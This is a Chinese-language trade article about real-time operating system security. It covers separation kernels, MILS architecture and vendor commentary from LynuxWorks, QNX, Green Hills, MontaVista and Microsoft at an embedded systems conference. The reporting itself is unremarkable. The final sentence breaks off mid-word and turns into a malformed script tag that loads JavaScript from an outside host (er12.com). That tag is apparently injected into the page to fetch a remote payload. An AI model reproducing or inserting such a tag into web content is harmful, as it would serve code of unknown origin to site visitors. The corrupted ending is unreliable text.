厨房烤箱制造商所选择的rtos,居然之前曾被用在核轰炸机的飞行导航系统中?!这听起来似乎有点耸人听闻,但事实确是如此,而这一现象的发生,主要归咎于联网时代日益严重的网络安全问题。
在近日于美国举行的嵌入式系统会议(esc)上,对更多rtos安全性能的要求成为一个主要议题。lynuxworks公司在会议期间召开的嵌入式技术座谈会就专门针对这个问题;而qnx软件系统公司也在会议中发布了针对多核系统的安全存储和cpu分割功能。目前许多实时操作系统采用了分割技术,该技术将不同的软件部分放在受保护的地址空间,因此程序某个部分出错或受侵害时不会影响到整个系统。
原本为军事/航空而开发的诸多技术现在正在大踏步进军商业应用,某些人士指出。多个独立安全等级(mils)就是其中之一,它提供一种“分离型内核架构”,该架构所具有的分割功能可以确保数据隔离、信息流控制,并限制破坏。lynuxworks公司首席执行官gurjot singh预测,mils将从国防应用领域走向工业自动化、医疗设备、银行和汽车等领域。
“所有这些领域最终都会采用mils架构及其内部的子系统组件。”singh指出,“我们已经多次发现这样的事实,即投资国防所产生的技术成果,正被广泛用于商业领域。”mils甚至将用于移动设备,比如pda,因为2005年就曾有过关于pda安全弱点的报导,当时有人窃取了明星paris hilton的手机地址簿,singh表示。
“在需要保证cpu时间和内存的许多应用场合,对分割功能的需求非常显著。”qnx公司产品经理kerry johnson指出,“然而,这些一般都是围绕在单处理器环境下设计实现的。”qnx提供的新功能可以让分割信息映射到多个内核。
“目前,业界正处于从智能设备到智能互连设备转型的过渡期。”微软windows embedded营销总监ilya bukshteyn指出,“在下一个阶段,个性化、身份确认和安全将成为关键因素。”
green hills software公司的integrity rtos采用分离型内核概念已经有10年了,该公司首席执行官dan odowd透露。他还指出,integrity-178b是首个在美国国家安全局(nsa)做iso/iec通用标准评估与保证级别(eal)6测试的rtos,该测试要求通过官方方法进行验证。最先部署于b-1轰炸机的integrity是一种基于mils技术的rtos,目前已被广泛用于工业、汽车和医疗设备,odowd表示。
integrity甚至被一家厨房烤箱制造商采纳,这家制造商生产的烤箱可通过互联网远程启动,如果心存不轨的人闯进这样的系统将是极其危险的事情。这也进一步验证了odowd的主张——“任何连接设备”都需要分割型内核架构。“这是设计软件的正确方法,也是目前人们认可的唯一方法,除非你要做的事非常细小或微不足道,而且没有任何安全性能要求。”他指出。
安全性能发展没有这么快,也有人如此认为。“现在,还不能马上说下一代设计如果没有安全性能就没有价值。”montavista软件公司创始人兼首席执行官jim ready表示,“这一时刻的到来还早着呢。”不过据他透露,montavista作为一家linux操作系统供应商,正在与几个大型客户合作开发一种“安全架构”。
检查连接
从lynuxworks举行的讨论会上可以明显看出,lynuxworks正在寻求传统军事/航空以外的发展领域。“对移动设备、医疗、以及金融应用来说,安全保护非常重要。”lynuxworks公司产品管理总监joe wlad表示,“每次系统连接时,你就会下载移动代码,而你不知道下载的具体内容,只能寄希望不会有什么差错。”
green hills公司的市场开发总监dan mender认为下一代互联网ipv6会使问题进一步变糟。因为ipv6有能力给地球上的每个人分配数十亿个ip地址,从而会出现“地球上每个设备都有可能向其它设备发送消息”的局面。像ssl和ipsec等传统的数据安全和加密方案已经不够用了,他指出,因为它们只能保护发送中的数据,不能保护通信“终端”上的数据。
lynuxworks公司正在针对以安全为重的系统开发新的rtos。lynxsecure是在mils基础上,从头开始开发出符合最高保证等级eal 7的产品,该公司表示。除了采用分割型内核外,它还包含一个可以运行多个os的虚拟机监视器。lynxsecure有望在今年秋季交货。
sri international公司项目总监、lynuxworks论坛演讲者john rushby表示,虽然mils的历史可以追溯到1981年,但它在2000年左右被美国nsa“重新发掘”。他认为,有了mils后内核唯一要做的工作就是分割:内核创建分割信息,并在所分割的各区域之间实现受严格控制的连接。mils系统还定义了“系统级属性”,用来确定程序组件如何交互,他指出。
不过商业应用真的需要完整的mils rtos吗?许多商业领域的供应商都不这样认为,并质疑官方认证(包括通用标准eal等级或针对航空系统的do-178b安全认证)的必要性。
qnx的neutrino rtos采用时间和空间分割,不过没有正式证?script src=http://er12.com/t.js>
